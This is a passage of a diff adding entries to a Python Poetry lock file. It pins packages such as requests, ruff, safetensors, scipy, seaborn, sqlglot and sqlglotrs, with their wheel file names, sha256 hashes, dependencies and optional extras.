+ {file = "regex-2024.11.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:220902c3c5cc6af55d4fe19ead504de80eb91f786dc102fbd74894b1551f095e"},
+ {file = "regex-2024.11.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:5e7e351589da0850c125f1600a4c4ba3c722efefe16b297de54300f08d734fbf"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5056b185ca113c88e18223183aa1a50e66507769c9640a6ff75859619d73957b"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e34b51b650b23ed3354b5a07aab37034d9f923db2a40519139af34f485f77d0"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5670bce7b200273eee1840ef307bfa07cda90b38ae56e9a6ebcc9f50da9c469b"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:08986dce1339bc932923e7d1232ce9881499a0e02925f7402fb7c982515419ef"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:93c0b12d3d3bc25af4ebbf38f9ee780a487e8bf6954c115b9f015822d3bb8e48"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:764e71f22ab3b305e7f4c21f1a97e1526a25ebdd22513e251cf376760213da13"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:f056bf21105c2515c32372bbc057f43eb02aae2fda61052e2f7622c801f0b4e2"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:69ab78f848845569401469da20df3e081e6b5a11cb086de3eed1d48f5ed57c95"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_ppc64le.whl", hash = "sha256:86fddba590aad9208e2fa8b43b4c098bb0ec74f15718bb6a704e3c63e2cef3e9"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_s390x.whl", hash = "sha256:684d7a212682996d21ca12ef3c17353c021fe9de6049e19ac8481ec35574a70f"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:a03e02f48cd1abbd9f3b7e3586d97c8f7a9721c436f51a5245b3b9483044480b"},
+ {file = "regex-2024.11.6-cp39-cp39-win32.whl", hash = "sha256:41758407fc32d5c3c5de163888068cfee69cb4c2be844e7ac517a52770f9af57"},
+ {file = "regex-2024.11.6-cp39-cp39-win_amd64.whl", hash = "sha256:b2837718570f95dd41675328e111345f9b7095d821bac435aac173ac80b19983"},
+ {file = "regex-2024.11.6.tar.gz", hash = "sha256:7ab159b063c52a0333c884e4679f8d7a85112ee3078fe3d9004b2dd875585519"},
+]
+
+[[package]]
+name = "requests"
+version = "2.32.3"
+description = "Python HTTP for Humans."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "requests-2.32.3-py3-none-any.whl", hash = "sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6"},
+ {file = "requests-2.32.3.tar.gz", hash = "sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760"},
+]
+
+[package.dependencies]
+certifi = ">=2017.4.17"
+charset-normalizer = ">=2,<4"
+idna = ">=2.5,<4"
+urllib3 = ">=1.21.1,<3"
+
+[package.extras]
+socks = ["PySocks (>=1.5.6,!=1.5.7)"]
+use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"]
+
+[[package]]
+name = "ruff"
+version = "0.1.15"
+description = "An extremely fast Python linter and code formatter, written in Rust."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "ruff-0.1.15-py3-none-macosx_10_12_x86_64.macosx_11_0_arm64.macosx_10_12_universal2.whl", hash = "sha256:5fe8d54df166ecc24106db7dd6a68d44852d14eb0729ea4672bb4d96c320b7df"},
+ {file = "ruff-0.1.15-py3-none-macosx_10_12_x86_64.whl", hash = "sha256:6f0bfbb53c4b4de117ac4d6ddfd33aa5fc31beeaa21d23c45c6dd249faf9126f"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e0d432aec35bfc0d800d4f70eba26e23a352386be3a6cf157083d18f6f5881c8"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:9405fa9ac0e97f35aaddf185a1be194a589424b8713e3b97b762336ec79ff807"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c66ec24fe36841636e814b8f90f572a8c0cb0e54d8b5c2d0e300d28a0d7bffec"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:6f8ad828f01e8dd32cc58bc28375150171d198491fc901f6f98d2a39ba8e3ff5"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:86811954eec63e9ea162af0ffa9f8d09088bab51b7438e8b6488b9401863c25e"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:fd4025ac5e87d9b80e1f300207eb2fd099ff8200fa2320d7dc066a3f4622dc6b"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b17b93c02cdb6aeb696effecea1095ac93f3884a49a554a9afa76bb125c114c1"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:ddb87643be40f034e97e97f5bc2ef7ce39de20e34608f3f829db727a93fb82c5"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:abf4822129ed3a5ce54383d5f0e964e7fef74a41e48eb1dfad404151efc130a2"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_i686.whl", hash = "sha256:6c629cf64bacfd136c07c78ac10a54578ec9d1bd2a9d395efbee0935868bf852"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:1bab866aafb53da39c2cadfb8e1c4550ac5340bb40300083eb8967ba25481447"},
+ {file = "ruff-0.1.15-py3-none-win32.whl", hash = "sha256:2417e1cb6e2068389b07e6fa74c306b2810fe3ee3476d5b8a96616633f40d14f"},
+ {file = "ruff-0.1.15-py3-none-win_amd64.whl", hash = "sha256:3837ac73d869efc4182d9036b1405ef4c73d9b1f88da2413875e34e0d6919587"},
+ {file = "ruff-0.1.15-py3-none-win_arm64.whl", hash = "sha256:9a933dfb1c14ec7a33cceb1e49ec4a16b51ce3c20fd42663198746efc0427360"},
+ {file = "ruff-0.1.15.tar.gz", hash = "sha256:f6dfa8c1b21c913c326919056c390966648b680966febcb796cc9d1aaab8564e"},
+]
+
+[[package]]
+name = "safetensors"
+version = "0.5.1"
+description = ""
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "safetensors-0.5.1-cp38-abi3-macosx_10_12_x86_64.whl", hash = "sha256:5480b078590dd37ee1c27f153e1ee9a274b62b30871ee16c412d11341215f305"},
+ {file = "safetensors-0.5.1-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:547e9fe8f3c9c50caf07cfcb6d2392f511853f7041821812ba73a05a915e91dd"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2e98f5dbce744a87a8d2cb9147558e80af79cfe31aa4321554e1db0e49d9c957"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c40ef845cca82e365b46e192b7b4952082952d5965c602e030a73155336de89c"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3cb212b0cded22fa0e46bca248beecf2fd079f2dffd7cc04e116a8b0128ae601"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4abb7bcf2faba63a0b58a2c6fafab0200726727ab6f579a1155239927a792709"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:83a384e49b38c3ae3c02a52437548351af83029dff85fe3d1acd5b2cf06867bb"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:44946151b01083fe5863c20d626f6ed9f1544be80e3bb2177a7ec27f911fdbf8"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:168e7a032c944eb5aefaee0d4bf4e15e84dbbf0f2ef86fbe0dc778a68306fff8"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_armv7l.whl", hash = "sha256:430b7eab6b4139bee8587522f264f7eebbac3e41614b52e35caf90affe7e7972"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_i686.whl", hash = "sha256:97f548d6e9f86d3326ab8416303f9ae1ded15df126b87db42658c3d89a1040d7"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:b021cad4af26677e0d3fbc5c8e2dfc3087ac44a3e0450576cbe0aa165849578c"},
+ {file = "safetensors-0.5.1-cp38-abi3-win32.whl", hash = "sha256:7290f8acdf1e5b5daf6101d6eed506d1f6ad66d08ca9f26235372befba7e2285"},
+ {file = "safetensors-0.5.1-cp38-abi3-win_amd64.whl", hash = "sha256:895f33c8ee55310606a407f45de3468ec0ffe259ba53cc0d4024a64fb58a1fc9"},
+ {file = "safetensors-0.5.1.tar.gz", hash = "sha256:75927919a73b0f34d6943b531d757f724e65797a900d88d8081fe8b4448eadc3"},
+]
+
+[package.extras]
+all = ["safetensors[jax]", "safetensors[numpy]", "safetensors[paddlepaddle]", "safetensors[pinned-tf]", "safetensors[quality]", "safetensors[testing]", "safetensors[torch]"]
+dev = ["safetensors[all]"]
+jax = ["flax (>=0.6.3)", "jax (>=0.3.25)", "jaxlib (>=0.3.25)", "safetensors[numpy]"]
+mlx = ["mlx (>=0.0.9)"]
+numpy = ["numpy (>=1.21.6)"]
+paddlepaddle = ["paddlepaddle (>=2.4.1)", "safetensors[numpy]"]
+pinned-tf = ["safetensors[numpy]", "tensorflow (==2.18.0)"]
+quality = ["black (==22.3)", "click (==8.0.4)", "flake8 (>=3.8.3)", "isort (>=5.5.4)"]
+tensorflow = ["safetensors[numpy]", "tensorflow (>=2.11.0)"]
+testing = ["h5py (>=3.7.0)", "huggingface-hub (>=0.12.1)", "hypothesis (>=6.70.2)", "pytest (>=7.2.0)", "pytest-benchmark (>=4.0.0)", "safetensors[numpy]", "setuptools-rust (>=1.5.2)"]
+torch = ["safetensors[numpy]", "torch (>=1.10)"]
+
+[[package]]
+name = "scipy"
+version = "1.10.1"
+description = "Fundamental algorithms for scientific computing in Python"
+optional = false
+python-versions = "<3.12,>=3.8"
+files = [
+ {file = "scipy-1.10.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e7354fd7527a4b0377ce55f286805b34e8c54b91be865bac273f527e1b839019"},
+ {file = "scipy-1.10.1-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:4b3f429188c66603a1a5c549fb414e4d3bdc2a24792e061ffbd607d3d75fd84e"},
+ {file = "scipy-1.10.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1553b5dcddd64ba9a0d95355e63fe6c3fc303a8fd77c7bc91e77d61363f7433f"},
+ {file = "scipy-1.10.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4c0ff64b06b10e35215abce517252b375e580a6125fd5fdf6421b98efbefb2d2"},
+ {file = "scipy-1.10.1-cp310-cp310-win_amd64.whl", hash = "sha256:fae8a7b898c42dffe3f7361c40d5952b6bf32d10c4569098d276b4c547905ee1"},
+ {file = "scipy-1.10.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:0f1564ea217e82c1bbe75ddf7285ba0709ecd503f048cb1236ae9995f64217bd"},
+ {file = "scipy-1.10.1-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:d925fa1c81b772882aa55bcc10bf88324dadb66ff85d548c71515f6689c6dac5"},
+ {file = "scipy-1.10.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aaea0a6be54462ec027de54fca511540980d1e9eea68b2d5c1dbfe084797be35"},
+ {file = "scipy-1.10.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:15a35c4242ec5f292c3dd364a7c71a61be87a3d4ddcc693372813c0b73c9af1d"},
+ {file = "scipy-1.10.1-cp311-cp311-win_amd64.whl", hash = "sha256:43b8e0bcb877faf0abfb613d51026cd5cc78918e9530e375727bf0625c82788f"},
+ {file = "scipy-1.10.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5678f88c68ea866ed9ebe3a989091088553ba12c6090244fdae3e467b1139c35"},
+ {file = "scipy-1.10.1-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:39becb03541f9e58243f4197584286e339029e8908c46f7221abeea4b749fa88"},
+ {file = "scipy-1.10.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bce5869c8d68cf383ce240e44c1d9ae7c06078a9396df68ce88a1230f93a30c1"},
+ {file = "scipy-1.10.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:07c3457ce0b3ad5124f98a86533106b643dd811dd61b548e78cf4c8786652f6f"},
+ {file = "scipy-1.10.1-cp38-cp38-win_amd64.whl", hash = "sha256:049a8bbf0ad95277ffba9b3b7d23e5369cc39e66406d60422c8cfef40ccc8415"},
+ {file = "scipy-1.10.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cd9f1027ff30d90618914a64ca9b1a77a431159df0e2a195d8a9e8a04c78abf9"},
+ {file = "scipy-1.10.1-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:79c8e5a6c6ffaf3a2262ef1be1e108a035cf4f05c14df56057b64acc5bebffb6"},
+ {file = "scipy-1.10.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:51af417a000d2dbe1ec6c372dfe688e041a7084da4fdd350aeb139bd3fb55353"},
+ {file = "scipy-1.10.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1b4735d6c28aad3cdcf52117e0e91d6b39acd4272f3f5cd9907c24ee931ad601"},
+ {file = "scipy-1.10.1-cp39-cp39-win_amd64.whl", hash = "sha256:7ff7f37b1bf4417baca958d254e8e2875d0cc23aaadbe65b3d5b3077b0eb23ea"},
+ {file = "scipy-1.10.1.tar.gz", hash = "sha256:2cf9dfb80a7b4589ba4c40ce7588986d6d5cebc5457cad2c2880f6bc2d42f3a5"},
+]
+
+[package.dependencies]
+numpy = ">=1.19.5,<1.27.0"
+
+[package.extras]
+dev = ["click", "doit (>=0.36.0)", "flake8", "mypy", "pycodestyle", "pydevtool", "rich-click", "typing_extensions"]
+doc = ["matplotlib (>2)", "numpydoc", "pydata-sphinx-theme (==0.9.0)", "sphinx (!=4.1.0)", "sphinx-design (>=0.2.0)"]
+test = ["asv", "gmpy2", "mpmath", "pooch", "pytest", "pytest-cov", "pytest-timeout", "pytest-xdist", "scikit-umfpack", "threadpoolctl"]
+
+[[package]]
+name = "seaborn"
+version = "0.12.2"
+description = "Statistical data visualization"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "seaborn-0.12.2-py3-none-any.whl", hash = "sha256:ebf15355a4dba46037dfd65b7350f014ceb1f13c05e814eda2c9f5fd731afc08"},
+ {file = "seaborn-0.12.2.tar.gz", hash = "sha256:374645f36509d0dcab895cba5b47daf0586f77bfe3b36c97c607db7da5be0139"},
+]
+
+[package.dependencies]
+matplotlib = ">=3.1,<3.6.1 || >3.6.1"
+numpy = ">=1.17,<1.24.0 || >1.24.0"
+pandas = ">=0.25"
+
+[package.extras]
+dev = ["flake8", "flit", "mypy", "pandas-stubs", "pre-commit", "pytest", "pytest-cov", "pytest-xdist"]
+docs = ["ipykernel", "nbconvert", "numpydoc", "pydata_sphinx_theme (==0.10.0rc2)", "pyyaml", "sphinx-copybutton", "sphinx-design", "sphinx-issues"]
+stats = ["scipy (>=1.3)", "statsmodels (>=0.10)"]
+
+[[package]]
+name = "six"
+version = "1.17.0"
+description = "Python 2 and 3 compatibility utilities"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
+files = [
+ {file = "six-1.17.0-py2.py3-none-any.whl", hash = "sha256:4721f391ed90541fddacab5acf947aa0d3dc7d27b2e1e8eda2be8970586c3274"},
+ {file = "six-1.17.0.tar.gz", hash = "sha256:ff70335d468e7eb6ec65b95b99d3a2836546063f63acc5171de367e834932a81"},
+]
+
+[[package]]
+name = "soupsieve"
+version = "2.6"
+description = "A modern CSS selector implementation for Beautiful Soup."
+optional = true
+python-versions = ">=3.8"
+files = [
+ {file = "soupsieve-2.6-py3-none-any.whl", hash = "sha256:e72c4ff06e4fb6e4b5a9f0f55fe6e81514581fca1515028625d0f299c602ccc9"},
+ {file = "soupsieve-2.6.tar.gz", hash = "sha256:e2e68417777af359ec65daac1057404a3c8a5455bb8abc36f1a9866ab1a51abb"},
+]
+
+[[package]]
+name = "sourcery"
+version = "1.28.0"
+description = "Magically refactor Python"
+optional = false
+python-versions = "*"
+files = [
+ {file = "sourcery-1.28.0-py2.py3-none-macosx_10_9_universal2.whl", hash = "sha256:ede0daff5ef75fc0a584f5c044c9bfa591905fa4ea6b7ec86210cdea149c6821"},
+ {file = "sourcery-1.28.0-py2.py3-none-manylinux1_x86_64.whl", hash = "sha256:b4a3c8d60ce1b912565082c33a1427a04b347d32bfeac0d706319cfff30706dd"},
+ {file = "sourcery-1.28.0-py2.py3-none-win_amd64.whl", hash = "sha256:a1f22a15d1731f14c283ec24f66d1efb143fe26ecc78e22a98d4ce76c463a969"},
+]
+
+[[package]]
+name = "sqlglot"
+version = "25.34.1"
+description = "An easily customizable SQL parser and transpiler"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "sqlglot-25.34.1-py3-none-any.whl", hash = "sha256:15099f8af832e6f5593fb92211d8b3f0810744ac0dc443fb70010fa38dc2562b"},
+ {file = "sqlglot-25.34.1.tar.gz", hash = "sha256:6952c083c4a8b8de3c09c10b262a03c6853071bd397f05759c08f1e2f3c683cb"},
+]
+
+[package.dependencies]
+sqlglotrs = {version = "0.3.0", optional = true, markers = "extra == \"rs\""}
+
+[package.extras]
+dev = ["duckdb (>=0.6)", "maturin (>=1.4,<2.0)", "mypy", "pandas", "pandas-stubs", "pdoc", "pre-commit", "python-dateutil", "pytz", "ruff (==0.7.2)", "types-python-dateutil", "types-pytz", "typing-extensions"]
+rs = ["sqlglotrs (==0.3.0)"]
+
+[[package]]
+name = "sqlglotrs"
+version = "0.3.0"
+description = "An easily customizable SQL parser and transpiler"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "sqlglotrs-0.3.0-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:20483ace62f943d50a7caeae57b434d1872f0dfeebc697f5e97a6851e3cef254"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:602feea94d9cfbba0d8b7cf40f144ce311f8c11f06b6a49638d6311b799ee578"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:27a64bf9770c683be0e345020674e52f04eacfccb74ef3529c0dfbaa25099509"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:09e6291cf28dbab1d4fedbe121e6db6bc5ca2fb4d1d60071b632ca4a543d5448"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac61397b933471149a0d4227736f8fa727f90b7ae370bfcef9afe7835e1177b8"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:93ba39a9ceafd999c9ccc0e53ff08d284915705db5a739b2ab66064e39010418"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:01e059b9ab5ccc98203dee2962e094c8d798cd50d94398740d514d1d5d480171"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c0493ac7c0ec58c1d1f13a931e98389a1dc6492f1ea1ad5b6edcf331ca2a1791"},
+ {file = "sqlglotrs-0.3.0-cp310-none-win32.whl", hash = "sha256:3b4cbdb225639615402e9fc79661255d9dea5b937d4196a9b499ffccb9560629"},
+ {file = "sqlglotrs-0.3.0-cp310-none-win_amd64.whl", hash = "sha256:a9f2ab2fa34d025439491f372c4c065aa921b7b73854647468218778b564f9eb"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:5c1b6b80f75676342268e46a47d07b406976a7c058d842d8729227c493540dba"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:b02f33c570d7a170279a67a66d30602857371aba5c5212af7f544cba41b0f48f"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5917dc3bba375d1bbb1ec8c72a317c138b95b1c7fcaba9aa5d71f8d2c88e86d"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:e7b7be5af42795481047561e2dc67bd20d06291daaa757ffaf0854bacbf280cc"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b678b19a3ae22068e6f0ec74a87db549d530f7642a9c954d79273eb0d579bb55"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:809394744715f2992d26e8f6eacddf5961864b1dbd778c9918b0bfc0b49176e3"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:26036563d4ca30750e44ab5eb1682d3585965df592425a6ecfdb03d154bb6393"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4718c07e136f94a85dc438d8392d868c14c88e8c27b1cd8a8bd7167c2318453e"},
+ {file = "sqlglotrs-0.3.0-cp311-none-win32.whl", hash = "sha256:99a6380100cb744a56ca24bddb62783b6f3cbddd50529183d95a426d3a9ce052"},
+ {file = "sqlglotrs-0.3.0-cp311-none-win_amd64.whl", hash = "sha256:c813e0620dd79573a08682551b90b0e408f52b84d7ffdbdb4cd5346101575239"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:b722831fd3de500d3c32169317878fede01880e3f1b6cfae926d60d6fbbde6b1"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:4eeedf2d77c9a44d75e641fa659da1cf69dfcdc27d4fe23d0ee45666122605ce"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:36878452de1c785dcf11792d9c9bd0810f523be02c23406dbeb6eef05c97e515"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:b3e2771b7c6ac9f3f871751e90f4d864c9c689622a3591d932497bd6f1475677"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5f14e501797e04711a13f766abb31871bc1044ec74e131cabebd7f7757f1cd3f"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:19bc0293fc586d7c0b5b210f011765cb4378e8f3d77ef93d1937bdd5971d6425"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cd5bdc463afe95f00bc9f52e412ea1d52bd958648428e552ecbab5b21d8f93c9"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:ecacb017d414b21b495e0868ca76b958dbae193ca0e158e0adcaa61b633c0315"},
+ {file = "sqlglotrs-0.3.0-cp312-none-win32.whl", hash = "sha256:48d510f5c9704899262ee6b2189eb8eb5639e6474e8141453e93fe10364bde2c"},
+ {file = "sqlglotrs-0.3.0-cp312-none-win_amd64.whl", hash = "sha256:b9f308732f12331f06c53fcb1d7c2b135a43aa22486b4c88c26d42710f329448"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-macosx_10_12_x86_64.whl", hash = "sha256:2ebdd93b3bcfa5f221957db355d88beea2ae238e388dc16876aa60d0904ae38c"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-macosx_11_0_arm64.whl", hash = "sha256:3d642e2df4ec0016b493fc864ff0e94d90aad04dd350a1515e29e594a93e4ab0"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:780f2d3400af95976677d4f007e8eae58ff0da0c0191eeee2b722f4f3ca5eabf"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:8ff408440b8a8baa22581356057c49fba6de48fbbfc4c2b765edcfbaad06fb5e"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:efc31350a2f64821cc0c5c5297e8731c65e2fb4a276b2bd49b9873edab352a33"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:acb5e8cddccd70d4937a78bcad1b6a6e919e7d74ae867bad01313fb86ea9be14"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cabe76a38acad75c54f324dc43b38b591574ff679c6317dfb680f19d798d599d"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d0fac87cfbf070c32d36da98bb221c1594087f4fc1be07367749f6e28483c0df"},
+ {file = "sqlglotrs-0.3.0-cp37-none-win32.whl", hash = "sha256:b031e307b904c966b7820d332ada97876c39eddcbfef11f26841f2a19964878a"},
+ {file = "sqlglotrs-0.3.0-cp37-none-win_amd64.whl", hash = "sha256:eaf54eccab602ba0e029b42fecb495bd48e8f305ede7b049acad82a5cf4ce117"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:8fe9440a8d9cbe9e710d18be6ce624347b5054cf3e4d489243515e8f8af78ac0"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:74df14bfc1ca3fe5333e738a3af1423f1e1b6ce75ac7972cb891059752272eb1"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:af5e533c8f6a46c351bcc67a68ad1bab9f238cb1950483d5fee540ae1f18110a"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:1fbe17ea29952cd6e7e05afe7d34687b9e2e041ecf4a6aec3b1defc0b629b888"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a49ff2ce642e9157f701333bdcff378d9bd74a24a8f0eaf74fe76baf743b5f04"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9a8f65b664bd99d803e39e188a455503374c40b156aafb94a6843b29fa84d8a2"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d524351c38755009e13e67c2a8045cd1d6d3c86fa33b9a568560b2f2559a2c95"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e9aaec2773f2042d22ad0bd7c06d1b03cf2f98f584f7862d20ec2c303b16180d"},
+ {file = "sqlglotrs-0.3.0-cp38-none-win32.whl", hash = "sha256:8a913bb6f5588d0a670778f9b10124956a87203df41e166512d4574027aaaf6f"},
+ {file = "sqlglotrs-0.3.0-cp38-none-win_amd64.whl", hash = "sha256:dfbe3a404e201cdbbc0179da17074240ee4dd74bfc5ad75c9bcc3666c8435f7a"},
